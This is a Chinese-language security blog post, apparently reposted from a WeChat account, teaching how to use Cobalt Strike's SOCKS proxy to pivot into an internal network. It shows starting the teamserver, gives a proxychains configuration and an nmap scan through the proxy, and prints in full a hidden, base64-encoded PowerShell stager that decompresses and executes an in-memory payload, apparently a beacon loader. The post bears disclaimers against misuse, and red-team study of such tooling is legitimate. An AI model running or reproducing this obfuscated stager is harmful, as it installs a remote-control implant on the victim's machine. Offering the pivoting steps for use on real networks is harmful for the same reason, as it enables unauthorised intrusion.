声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
本次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:proxychains,nmap等。攻击的拓扑结构如下图所示。
首先启动CobaltStrike的服务端,并执行命令如下所示:
192.168.43.137 xxxxxx > ./teamserver
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAE4AQwBKAEcAbQAwAEgAOABkAGEAZQB6AFMAUQBIAEIAUgBSAEUAUgBQAEcARwBmAFQAcQBkAEUAawBwAEYAdQBSAFkARgBnAG0AZgBuAHYAMgArAEIAMgB0ADIAegAwADcAMAA3AHkAYQA2AEoAbwBRAHIAZQB5ADEAUABQAGUANgBsAFgAZwAvAGgAUgB3ADgAZwB5ADgATQBnAHoASQBmAFcANABnAEMAaQAwAFAASgBkAGkANwB1ACsAMwBrAFcAdgBnAGIASgAwAHQAWABuAGMAUQB2AC8AcgBJAE0AMQA2AEIAYQBTAEkAWQBoAHQAVABmADkAMwBjAHEAUQBNAEMAaABpAGcAOAB4AFEASwArAE8AWgAwAFkAMgByAEYARAA1AEoAaABPAEUAWgBvAFIAZwA2AGUANwB1AC8AaQA1AC8ARgBiAGsAaAAyAE0ASgBYAEYAMgBBAHIAaABxADgATwB4AEgAdgBQAEQASwBuAHYAVgBQAEcAWgA5AFgAMwBPAGMANABEAGwAdgB2AHoAeABSAHkAOQBDAEMATAByADQAcwBxAC8AMgBJAFcAYgBEAEUARABvAGIAMgA0AEoAaABzAFUAVAA5AGsAMQByAHUASQBZAEsAUAA0ADgAMABCAEcAcABqADYAbQAzAHAANAByAGYAWgB0AGIAdwBQAHMAcQAxAGoAYQBBADgAYQBlAG4ASQBKADEAegBlAHkAYgA3AEIAawBnAE8AMABGAFYAOAAyADAATABGAHcAdAAvAC8AVgBVAG8AUABUAC8AVwBYAHEAcAA4AEUAQQBFADcATABCAGEAMABOAE0AVABRAHEAWgBxADIAWABTAGgAUgBQADAAcQBaAHcAMQBuAHEAdwAyAEoAaABaAEIAbgBJAEMANwAwAHQAcgBpADQAdAB0ADgANQBVADUAegBsADYASgBRAGMALwB1AG0AQQB2AGwASwA0AG4AMgAvAG0AQQBuAE8AUAByAFEAMgBaAFcATAB6AHIARgBBAGwAbQBxAGgAQgB2ADIAdwBtAEcAaABRAGoAMQBuAC8AcAA1AGYAWABxAGcALwAzADkAQgBNAEkAeABkAGIARABxAHkASwBMAG8AYgBJADgAegBXAEkAWQBzAHUAQQBZAFgAVQBBAFgATgBPAEcAVQA3AGcAbABhAG8AVwBRAHgATQB6AGQARgBVAG8ARQBCAEkASQA0AFEAaQA1ADEAdwAwAEwAMABZAHUAOABJAGkAdwA5AHUAWgBOAHMAVgBZAHYAZgA1AGQAKwAyACsARgBCAFYANAB1AHAASAA3AHUAMAByAEYAagAwAHAARQBTAHMAVwBvAFYATABuAG0AeABPAC8AUQBNAGMAcgB6ADUAbQBLAE8ASABPAGMAWAA5AEIAKwBTAHEAMABSACsAdgB5AFIAWQA2AGYANwBIAFoANgBsAHEAUQBoAHYAdQBBAEkAYQB2AG0AUABEADcASQBWAGYAdgA3ACsANgBlADgAeQBVAGsANQB5AG0AcQBYAG0AagBsAGUAdAA4AHAAdQBrAEsATgBDAEEAaQBBAFAAWgBSAG0ANABaAHkAaABDAEoAWgBlADMAdQBOAHoAYwBYAHYAVABEAEMAdABmAEcAcQByAGQAdABLADQANgBsAC8AQgBjAGMASAB5AG4AbgBoAGUAZQBaAGIANwBjADMANQBYAHUAcgA5AG0AVAB2AFgALwBkAFIASgBaAHQAUQBwAFIAOQAvADcAbwBhAE8ATABpADEAWABNAGkAbABMAG4AQQBzADQANQBiAHcAeABjADkAaQBCAHIAYwAyAHoAUABtAG8AMwBzAFEAVQBnAHIATgBZAHUASAA2AEEASgBuAGQAbABwADUAQQBSACsAdgB5AHIARwB1ADkAWQArAEUAMgAzAGUAdwBIAEgARwBpAFQAdQBJAFUARgBGAFUAcQBMADAATQA1AGgATABEAEkAcwBGADAAUgAxAEIAaAAvAEIAMwAyAFoATQAwAGYAZABpAFMATQBvAE0AMwA2AFcAdABwAHAAVABmAHYAMgBUADcATAA1AFoANABOAHcAcgBCAEMAcQBSAEcAcABjADYATgBDAGEAUgBEAFkAMABLAHgAUQByAEIAdABhADEAMAA5AHMAaABMADEAOABXAFgAaQBIAE8ANABwAHMAYgBCAGsAZwB4AEQAZAB6AEwANgBWAFAASwBMADIANgA3AG4AawB1AHEAWgBqAEkASQBOAEUAbABOAE0AdwAwAEgAeABvAFcAcwBEAE4AVwBLAHQAVABBAE0AbQBFADMAMQBhAHoAZABEAFUATABoAFUAMAA1ADYAdwBMAFoASgB5AFIARgBMAE0AWQBrAEoAZQBaAE4AeABvAGUARQBzAFoANQBCAFoAKwBmAGYAOABLAEYAVQAxAGkARQBYAEgAdAA2AEYARABwAFAATQB1AEoATgBoAGcAUgAzAHIATwB0AGEATAB5AGQAQQBNADcAYQBCAGIAKwBBACsAeABiAG4AVgB5AEsASQB1AFAAcQBSAHQASQBIADAAQwBRAEIATgBOAHYARABGAFcAcABoAEkAVQB6ADYAVwBxAEgAeQBTACsATAA5AGIALwBCACsAYgBqAEUALwB3AGUAdwBoAGUAQQAxAGsATQBTADkARQBjAFUAcwBhACsAcQBVAEwARQBIAFoAQwA2ADAAeQBhAE0AUQB5AG8AcAAxAEoAVwBnAHMALwBkAEYARwBlADEAbABKAHMAeABzAHUAdgBtACsAeAB2AFIATwBhADAASQBFAHkAVQBCAGUAVQA0AFgAaABMAEQAVgAwAFAASQBlAFYAeQB6AFUAbQBXAGkAWABkAEYAUwA1AGwAWQA0AE8ASQBpAE8AbAB1AHEAcwBrAGgAcgB0AEEAZgBDAHoAMABRAFcAdQBmAFQASgBqAEkATQAyAFkAWQBCAFEATwBlAEkALwB1AHAAdwBZAFMAaAAzAGIAZgA5AHoAVgA0AE8AUQBDAEkAZgBEAGsAbQBuAHQAMABwADUAbABXAFYAawBxADIAVQAxAEwAVABHAFMAdQAyAGQAWABzAEEAeQBIADYARQAzAEcAbgBqADcAdABJAEQARgBXAEIATQA4AE8AMgA4AE8AZQBzAEoAdwBEADYAeABEAGsAdgBpAEsAbgBVAFQATgA1AGsATQBwAG4AbwA3AFYASABZAHcAWgA2ACsAawBrAEoAeABGAGgAbAB6AFcAVgBzAHQASgB5AGgASgA3AFEAdwAwAFYAMQBFAGYATwBRAGoAUABoAHEAcgBlAGkAUQBIAHMAaQBOAGEAagBYADMATQBMAGIAQQBVAGkALwAyAG4AdwBaAEQAUgB3AFoATwA5AGEAYwBOAGMAMwB3AHcAeQBYADMAcQB3AGkAMABHADIAUAAzAGUAeQB2AFIAWAAwAEkATQByADgANgBJAFIAOQBXAEsAKwAxADQARgBKAHEANgA2ADUAdgB3AFcAVwAwAE8ANQA4AFUAeQB6AEQAUABIAEcAUQBrADgAagA3AHkAUgBvAFkAZgAxAHAAVwB6AHMAVAAwAGUARAA4AEMAdgB6AGIAVgBqAGIAVABpAGIAcgAxAGUARQBtAHgAbwBJAGsATABCAHAASQBVADMAMwA3AFgAagBCAHoAbwA5ADEAZABZADEAeQBiAEwARgBBAE0AQwBvAFoAVABzAHQAZwBwAEwAUAB1AEgAOQBmAG0ASQB1AEQAcgA2AGsAYQBjAEQAMgB3AFUAUgBKAEwAbABOAE0ATwB1AG0ARgA1AGwASABDAG4AVgB0AEMANQA1AEQAdABmAG0ATQBIAGgAcQBtAG0AYwBtAEgAZgBnAE4AMABFAEkAVwA0AFQAUQBoAGYAdABvAFoAdgA4AFkAOABQAEkAagBMAHMAVwB1AHMAQgBNAHMAeAA5AGcAdwAzAFAAUgBnAGQASgB3AHEAYQBCAEgAZABqAG8ARQBqAEQAVgBZAEkAQwBMAEsARQBnAHQAbwBQAG0AVwBEAFUAeQAzAEwAbABlAEoAagA5AHAAMgBPAE0AYQBrAFEAOAAyAEIAMwBrAEkAeQBxAEkAMQBPAG8ARABPAE8AWgBTAEgATQBNADcAVwBxAGMAbwBOAGsAMQBRADgAaQBFADkAUgBOADkAUABqACsAdABKAE8AbQA1ADgATwBOAEUAKwBmADUATgA1AHUAYQA0AFMAUgBJAEkAdwA5ACsAVgBzAFQAUwBMAHcAeQBtAHQARQBLAHEANQBjAFYAdgBXAE0AUABEAEoAUwBlAFcASAAyAHEAbQB5AEoAcwAwAGsAbwBYAGEAZQBPAHcAbgB0AEMAZQB0ADkAUgBYAGQAbwBpAE4AdwBXAFEARwBKAHUAWQBaAE0ARwBQAFoANgA4AGoAVwBXAHMARgBEAGYAbABYAGYAMQBkAEIAUwBsAGoAUQByAEcASwBjAEsATQArAGYAWABVADgANgBSACsATwBtAHgAdAB1AHAAUABsAEcAZwBtADIATQBNAFoAMwBlAGwAeABYAFYAMwBoAFQAeQBOADUAdwBpAGYAagBPAFMAMgB0AHQASwBPAGcAVAB2AGMANwBiAHUATgAyAGcALwBWAHUAcABQAEUAbgBlAHQAWgBuAEYAWgByAEUAWgBEAEEAVABwAGgATwBXAHEAZABYAFoAWgBLADcAdwAwAHgAMQBuADkAaABOAGEAbQBCAG8ANgBXAHoAZQBuADIAdABIAHMAegB4AGIARwBTAEoAagBrADgAdgB0AE4AMwAzAGYANgArADcAMgB6AFcAYQAxAFAAUABhAHYAaABpADYAZgBwAFMAZgBLADcAdgBMAGcATABvADIANQA1AHQAMQBhADQAaABjAEwAWgBxADQAawByADcASgBsAEQAMwBEADYAcABtAHEAZAAyAE8ATgBSAFMAegAvAFoAeAByAFoAWgBwAHgAdQAxAGcANgBhAEIATgBsAFQATABmAFYAagB3AG0ATwBTAFAAdgBaAEQAYQBDAHQASgA3AE0AaABtAGMAdwBTADIAYwBIAHYATwBWAEMAdABVAFkAMwBXAHoAbwB6AGwANQBVAFQAbAA5AFMANwBRAG4ATwA1AGwAWAB1AGUAMwBtAHkAZQBZADgAWQBvAG0AeAAxADIATABXADIAVABPAEoARABNAGEAZABJAG8AZgA0AHYAcgAzAGYAQQAwAEUATgBkAGUAbwB2AEoATgBWAFcAbABLADcARgBZAGEATgAvAHEAbQB2AHAAVgAyAHIAdQBRAHgATQA0AEkAVQAxAHoAcgBiAGMASABqAGkAYQBzAEoAaQBOAFAAWAA4AG0AdQBvAE8ARwB1AHUAbQB2ADIAOABtAHMASQAzAFMAcwBJADQARwB6AG0ANQB4AGwARwBsAGwAdgB6ADEAQQBqADMAYQA2AFAAcQBRAFAAdQBLAFYAeQBZAEQAcQBTADAAQwBSAEsAcwBRADYAZABTAFcAMgBoAHIAcgA2AEoANgBVAEMAYwBKAFAAeQBXAGQAWgB6AGgAeABnAGcAWABXAGsAdQBkAEwAZABwAEQATQBKAEEAUwBIAEUAMgBqAHAANABQAHUAMQAyAGUAMgBKADkAUQB1AE8AUgAyAHMAUwBhADYAUwBHAGgAMQB1AHgASABOAFcAcQAwAE8AZwA1AHoAVQA3AFgATQBPAEcAZQBVAHIAdwBtAFEASAB0ADcAcwBuAG8AUgAwAEYAQwAvAGoAVABKAHkAZgBLAFMAeQBKADQAeQBtAFMAQgBnAFMARgA2AFAATgBzAHYAZwBSAFAASQBhAHQARABpAFgAYgBXADAATwBpACsAWgBDAEMASABwAFQASgBFAFkAOQBVAHYAYwBiAEcAdABaAHgARwA2AFQANgBRAFMAUgAyAGoAVABJAG4AeAAwAHIAYgBxAEgAZABGAHcARQA5AG8AVABaAGkARwBpAHAAQwB3AEMAcgA5AG4ANQB5AEsAZABTAGsAYgBFAGYAcwA5AGIANQBkAFoARABaAFAAcABKAHMAbwBuAGkASAB4AFIANQBQAHQAcQBZAGUAbQB0ADQAcABNADIAUgA5AHAAcQA5AEwANQBmAHoAbABuAGoAMwA5AHUAbgA1AEkAWABtADUAagBaAEYAdgArADgAZABOAFEAcwB6AFYAbQAvAGQAMwBQADIANwB6AFEAZwB3ACsAZABNADIAdgBwAHIATQBSAFEATwBFAGUAMgBLAFMAYgBrAGcAbgByAGQAagA4AEsASABoAEsAdQBjADUATABxAFcAWgBsAEcAcwBmAGoANQBhAEgAKwBFAHkASQBVADIARwBYAHYASgBZAEgAeQA3AFYAVgBqAGIAOQBvAHgAcwBzAHYAdABpAHgAUAByAHoAcgBlACsAVAAyADMATgBPAGwAbgBYAG0AMAAxAFgAcAAvAFkASQBvAGwAVwA1AFgAMwB5AGIAYQBiAHYAUAB4ADUAMwByAEUAMgB4AFQANABmAHAAVwBzAHkAZgBrAHEASAA0AGkAVQBvAGIAdgBEACsAdwBwAEYASgAzAFcAYQBwAHIATgBuAGcAeQBiAFcAZgBwACsAWQBuAHUAZQBuAHgAVABkADcAbABXAHoAKwArAHcARABsAG8AeQBzADcAZAAvAFUAMgBzAEsASABJAGQAZQBEAC8ATQBRAFkALwBlAGYAMwB2ADcARwBiADgANQBUAFAAawBPADMAcwA1AG8AcwA4AHAAeQB5ADcAbABmAHcARwB4ADMAMQBUAGcANAB3ADAAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.237.129的web应用,相关配置如下所示:
--- snippet ---
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 23612
>>> proxychains nmap -sT -Pn 192.168.237.129
-END-
▎经典文章精选
扫描下方 二维码 加入我们吧!
原文始发于微信公众号(安全攻防之道):CobaltStrike专题 | CobaltStrike 代理的使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论